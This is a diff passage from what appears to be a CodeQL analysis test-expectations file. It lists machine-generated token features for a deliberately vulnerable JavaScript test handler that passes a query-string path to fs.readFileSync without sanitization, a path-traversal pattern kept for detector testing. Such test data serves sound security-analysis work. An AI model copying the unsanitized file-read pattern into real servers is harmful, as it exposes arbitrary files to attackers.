http url | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:37 | exceptional return of path.concat(unknown) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:37 | exceptional return of path.concat(unknown) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:37 | exceptional return of path.concat(unknown) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:37 | exceptional return of path.concat(unknown) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:37 | exceptional return of path.concat(unknown) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | calleeImports | fs | @@ -11339,6 +87316,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:13:23:13:28 | concat | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:13:23:13:28 | concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:13:23:13:28 | concat | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:13:23:13:28 | concat | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:13:23:13:28 | concat | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:13:30:13:36 | unknown | CalleeFlexibleAccessPath | path.concat | | autogenerated/TaintedPath/tainted-string-steps.js:13:30:13:36 | unknown | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:13:30:13:36 | unknown | calleeImports | url | @@ -11349,6 +87331,47 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:13:30:13:36 | unknown | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:13:30:13:36 | unknown | receiverName | path | | autogenerated/TaintedPath/tainted-string-steps.js:13:30:13:36 | unknown | stringConcatenatedWith | path -endpoint- | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:38 | exceptional return of fs.read ... (path)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:38 | exceptional return of fs.read ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:38 | exceptional return of fs.read ... (path)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:38 | exceptional return of fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:38 | exceptional return of fs.read ... (path)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:38 | fs.read ... (path)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:38 | fs.read ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:38 | fs.read ... (path)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:38 | fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:14:2:14:38 | fs.read ... (path)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:14:5:14:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:14:5:14:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:14:5:14:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:14:5:14:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:14:5:14:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:24 | unknown | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:24 | unknown | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:24 | unknown | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:24 | unknown | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:24 | unknown | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:24 | unknown | stringConcatenatedWith | -endpoint- path | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:31 | unknown.concat | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:31 | unknown.concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:31 | unknown.concat | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:31 | unknown.concat | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:31 | unknown.concat | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:37 | exceptional return of unknown.concat(path) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:37 | exceptional return of unknown.concat(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:37 | exceptional return of unknown.concat(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:37 | exceptional return of unknown.concat(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:37 | exceptional return of unknown.concat(path) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | calleeImports | fs | @@ -11358,6 +87381,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:14:26:14:31 | concat | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:14:26:14:31 | concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:14:26:14:31 | concat | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:14:26:14:31 | concat | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:14:26:14:31 | concat | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:14:33:14:36 | path | CalleeFlexibleAccessPath | unknown.concat | | autogenerated/TaintedPath/tainted-string-steps.js:14:33:14:36 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:14:33:14:36 | path | contextFunctionInterfaces | | @@ -11367,6 +87395,47 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:14:33:14:36 | path | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:14:33:14:36 | path | receiverName | unknown | | autogenerated/TaintedPath/tainted-string-steps.js:14:33:14:36 | path | stringConcatenatedWith | unknown -endpoint- | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:47 | exceptional return of fs.read ... path)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:47 | exceptional return of fs.read ... path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:47 | exceptional return of fs.read ... path)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:47 | exceptional return of fs.read ... path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:47 | exceptional return of fs.read ... path)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:47 | fs.read ... path)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:47 | fs.read ... path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:47 | fs.read ... path)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:47 | fs.read ... path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:15:2:15:47 | fs.read ... path)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:15:5:15:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:15:5:15:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:15:5:15:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:15:5:15:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:15:5:15:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:24 | unknown | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:24 | unknown | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:24 | unknown | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:24 | unknown | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:24 | unknown | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:24 | unknown | stringConcatenatedWith | -endpoint- unknown + path | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:31 | unknown.concat | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:31 | unknown.concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:31 | unknown.concat | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:31 | unknown.concat | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:31 | unknown.concat | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:46 | exceptional return of unknown ... , path) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:46 | exceptional return of unknown ... , path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:46 | exceptional return of unknown ... , path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:46 | exceptional return of unknown ... , path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:46 | exceptional return of unknown ... , path) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:46 | unknown ... , path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:46 | unknown ... , path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:46 | unknown ... , path) | calleeImports | fs | @@ -11376,6 +87445,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:46 | unknown ... , path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:46 | unknown ... , path) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:15:18:15:46 | unknown ... , path) | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:15:26:15:31 | concat | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:15:26:15:31 | concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:15:26:15:31 | concat | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:15:26:15:31 | concat | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:15:26:15:31 | concat | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:15:33:15:39 | unknown | CalleeFlexibleAccessPath | unknown.concat | | autogenerated/TaintedPath/tainted-string-steps.js:15:33:15:39 | unknown | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:15:33:15:39 | unknown | contextFunctionInterfaces | | @@ -11394,6 +87468,46 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:15:42:15:45 | path | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:15:42:15:45 | path | receiverName | unknown | | autogenerated/TaintedPath/tainted-string-steps.js:15:42:15:45 | path | stringConcatenatedWith | unknown + unknown -endpoint- | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:29 | exceptional return of fs.read ... trim()) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:29 | exceptional return of fs.read ... trim()) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:29 | exceptional return of fs.read ... trim()) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:29 | exceptional return of fs.read ... trim()) | enclosingFunctionName | http.createServer#functionalargument | +| 